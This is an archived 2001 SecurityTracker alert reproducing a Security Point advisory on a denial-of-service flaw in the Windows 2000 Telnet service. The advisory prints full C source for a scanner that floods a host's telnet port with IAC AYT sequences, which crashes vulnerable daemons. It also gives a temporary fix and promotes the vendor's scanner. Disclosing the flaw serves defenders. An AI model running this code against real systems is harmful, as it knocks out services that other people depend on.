SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Telnet Vendors:   Microsoft
Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1002099
SecurityTracker URL:  http://securitytracker.com/id/1002099
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 27 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Tested on Windows 2000 Service Pack 2 with all patches applied
Description:   Security Point reported a vulnerability in the Windows 2000 Telnet service that allows remote users to cause the service to crash.

A remote user can reportedly send a specially crafted telnet command to the server to cause the service to crash.

Demonstration exploit code is included in the Source Message.

The vendor has been notified.

Impact:   A remote user can cause the telnet service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Vulnerability in Windows 2000 TELNET service


--3uo+9/B/ebqu+fSQ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


--3uo+9/B/ebqu+fSQ
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="spadv03.txt"

    Security Point
(R)
    info@secpoint.com
 http://www.secpoint.com/

Advisory #003
Title: Vulnerability in Windows 2000 TELNET service.
Date: 25-07-01


  		Copyright (c) 2001 SECURITY POINT
(R)

Contents:
=========

	I	Disclaimer
	II	Introduction
	III	Description
        IV      Demonstration code
	V	Fix
	VI	Contact
        VII     Security Point(R) Scanner
	VIII    Greetings

I - Disclaimer:
===============

This paper is for educational purpose only, Security Point(R) will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information, any use of this information is at the user's own risk.

II - Introduction:
==================
After coding a vulnerability scanner for the security hole in most telnet
daemons under UNIX it was found that the Windows 2000 Telnet service to be
vulnerable to a Denial of Service attack.
This was tested against a Windows 2000 Service Pack 2 and all single patches
applied.


III - Description:
==================
This utility is meant to scan for the AYT vulnerability in telnet daemons
build upon the BSD source.


IV - Demonstration code
=======================

/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 *
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW: http://www.secpoint.com
 * Email: info@secpoint.com
 * 
 * This program checks for the AYT overflow related to the
 * newly discovered telnetd vulnerabilities.
 *
 * Tested against:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *              Windows 2000 Service Pack2 Telnet service will 
 *              crash when scanned.
 *	Not vulnerable:
 *		netkit-telnet-0.17
 *
 *      
 *
 * Please keep us updated with the OS's that you check, and
 * report back to us on info@secpoint.com, weather the system 
 * is vulnerable or not. So we can construct a full list 
 * of vulnerable systems.
 *
 *
 * This source code is for educational purpose ONLY, 
 * Security Point(R) will not be responsible for any damages 
 * whatsoever that have a connection with this code. There are 
 * no warranties with regard to this information.
 *
 * Are your networks under attack at this moment?
 *
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 *
 * Please see http://www.secpoint.com/solutions.php
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>


struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

void handle_alarm(int signum) {
    alarm(0);
    timeout=1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
	printf("Usage: %s <host>\n", argv[0]);
	exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
	perror("gethostbyname");
	exit(0);
	exit(EXIT_FAILURE);
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
	perror("socket");
	exit(EXIT_FAILURE);
    }
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_family=AF_INET;
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
	perror("connect");
	exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n",argv[1]);
    printf("Sending telnet options... stand by...\n");
    signal(SIGALRM,handle_alarm);

    bzero(sendbuffer,sizeof(sendbuffer));
    for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
	sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
    }
    alarm(60);
    read(sock, buffer, sizeof(buffer));
    alarm(0);

    write(sock, sendbuffer, strlen(sendbuffer));
    
    bzero(buffer,sizeof(buffer));

    alarm(60);
    if (read(sock, buffer, sizeof(buffer)) <=0) {
	printf("Telnetd on %s vulnerable\n",argv[1]);
	exit(EXIT_SUCCESS);
    }
    alarm(0);
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    exit(EXIT_SUCCESS);
}


V - Fix:
========
Temporary solution:
Disable telnet service.
Do the following:

Start->Control-Panel->Administrative-Utils->Services
Find the telnet service and select disable

Microsoft has been notified on this issue and we are awaiting patch
information.


VI - Contact:
=============

If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
info@secpoint.com

VII - Security Point(R) Scanner:
=================
Are your networks under attack at this moment?

With Security Point(R) Scanner you can find and repair the vulnerabilities 
before the bad guys get in.

One of the world's most powerful security scanner, with more than 3000 checks.

A useable solution for each found vulnerability.

Scans: Firewalls, routers, UNIX, Windows...

User-friendly interface that presents professional reports in PDF format!



VIII - Greetings:
=================
: el8,cr,superluck,s1,cybk0red.

--3uo+9/B/ebqu+fSQ--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC